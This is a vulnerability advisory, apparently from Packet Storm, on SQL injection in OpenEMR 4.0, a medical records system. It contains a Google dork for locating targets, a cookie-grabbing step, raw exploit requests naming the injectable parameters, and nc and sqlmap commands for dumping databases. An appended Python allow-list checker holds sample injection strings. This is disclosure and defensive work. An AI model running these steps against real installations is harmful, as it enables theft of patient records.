Open EMR 4.0 SQL Injection

2011-10-21T00:00:00
ID PACKETSTORM:106079
Type packetstorm
Reporter Houssam Sahli
Modified 2011-10-21T00:00:00

Description

                                        
                                            `# Exploit Title: Open EMR  
# Google Dork: inurl:"/interface/login/login_frame.php" intitle:"Login" intext:"Username:"  
# Date: 3 / 08 / 2011 .  
# Author: Mehdi Boukazoula ; Houssam Sahli .  
# Software Link with patch : http://www.oemr.org/wiki/OpenEMR_Downloads  
# Version: v 4.0 full patched  
# Tested on: v 4.0  
# Description : the authenticated user can exploit this vulnerability by getting the cookie from browser using url javascript:alert(document.cookie) ,put it in request file with sql command and exploit:  
  
root@# cat request.txt | nc -vv yourhost 80  
or simply use sqlmap like this :  
root@# sqlmap -r request.txt -p "YOUR PARAMETER" --dbs  
--------------------------------------------------------------------------------------------------------  
  
---Request1 : Affected parameters : provider_id + pc_category  
POST http://127.0.0.1/openemr/interface/main/calendar/index.php?module=PostCalendar&func=search HTTP/1.1  
Accept-language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3  
Accept-encoding: identity  
Keep-alive: 115  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
User-agent: Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10  
Accept-charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7  
Host: 127.0.0.1  
Referer: http://127.0.0.1/openemr/interface/main/calendar/index.php?module=PostCalendar&func=search  
Cookie: PUT-THE-COOKIE-HERE  
Content-type: application/x-www-form-urlencoded  
Proxy-connection: keep-alive  
  
pc_keywords=bob&provider_id=_ALL_&end=08/10/2011&pc_category=&submit=Submit&start=08/03/2011&pc_keywords_andor=AND&pc_facility=  
--------------------------------------------------------------  
---Request2 : Affected parameters : form_patient_id  
POST http://127.0.0.1/openemr/interface/reports/chart_location_activity.php HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10 Paros/3.2.13  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3  
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7  
Keep-Alive: 115  
Proxy-Connection: keep-alive  
Referer: http://127.0.0.1/openemr/interface/reports/chart_location_activity.php  
Cookie: PUT-THE-COOKIE-HERE  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 38  
  
form_refresh=true&form_patient_id=patient  
---------------------------------------------------------------  
`
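A defensive check for the two affected endpoints, added here as an example and not part of the advisory or of OpenEMR's own code: it parses a raw request in the request.txt format shown above and flags values of provider_id, pc_category and form_patient_id that fall outside an expected format, the kind of allow-list a WAF rule or a pre-query validator in the application would apply. The allowed formats are assumptions about what the OpenEMR 4.0 forms legitimately submit, and the sample requests are constructed from Request1 and Request2.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Allow-list per affected endpoint, keyed by request path. The expected value
# formats are ASSUMPTIONS about what OpenEMR 4.0 forms legitimately submit:
# provider_id "_ALL_" or a numeric id, pc_category numeric or empty, and
# form_patient_id an alphanumeric patient identifier.
AFFECTED_PARAMS = {
    "/openemr/interface/main/calendar/index.php": {
        "provider_id": re.compile(r"(_ALL_|[0-9]+)?"),
        "pc_category": re.compile(r"[0-9]*"),
    },
    "/openemr/interface/reports/chart_location_activity.php": {
        "form_patient_id": re.compile(r"[A-Za-z0-9_-]*"),
    },
}

def parse_raw_request(raw):
    """Split a raw HTTP request (the request.txt format above) into
    (path, form fields); accepts absolute-URL and origin-form targets."""
    raw = raw.replace("\r\n", "\n")
    head, _, body = raw.partition("\n\n")
    target = head.split("\n", 1)[0].split()[1]
    return urlsplit(target).path, parse_qs(body, keep_blank_values=True)

def check_request(raw):
    """Return (parameter, value) pairs on an affected endpoint whose value
    fails the allow-list; an empty list means nothing to flag."""
    path, fields = parse_raw_request(raw)
    findings = []
    for name, pattern in AFFECTED_PARAMS.get(path, {}).items():
        for value in fields.get(name, []):
            if pattern.fullmatch(value) is None:
                findings.append((name, value))
    return findings

# Constructed sample requests modelled on Request1 and Request2 above.
CALENDAR_OK = (
    "POST http://127.0.0.1/openemr/interface/main/calendar/index.php"
    "?module=PostCalendar&func=search HTTP/1.1\r\nHost: 127.0.0.1\r\n"
    "Cookie: PUT-THE-COOKIE-HERE\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "pc_keywords=bob&provider_id=_ALL_&end=08/10/2011&pc_category="
    "&submit=Submit&start=08/03/2011&pc_keywords_andor=AND&pc_facility="
)
# The same request with a quote and a boolean clause smuggled into provider_id.
CALENDAR_BAD = CALENDAR_OK.replace("provider_id=_ALL_", "provider_id=1%27+OR+1%3D1")
REPORT_BAD = (
    "POST /openemr/interface/reports/chart_location_activity.php HTTP/1.1\r\n"
    "Host: 127.0.0.1\r\n\r\nform_refresh=true&form_patient_id=patient%27--"
)
```

Parameters not in the allow-list are ignored, so the check only says something about the three parameters the advisory names; the real fix is parameterised queries in the two scripts.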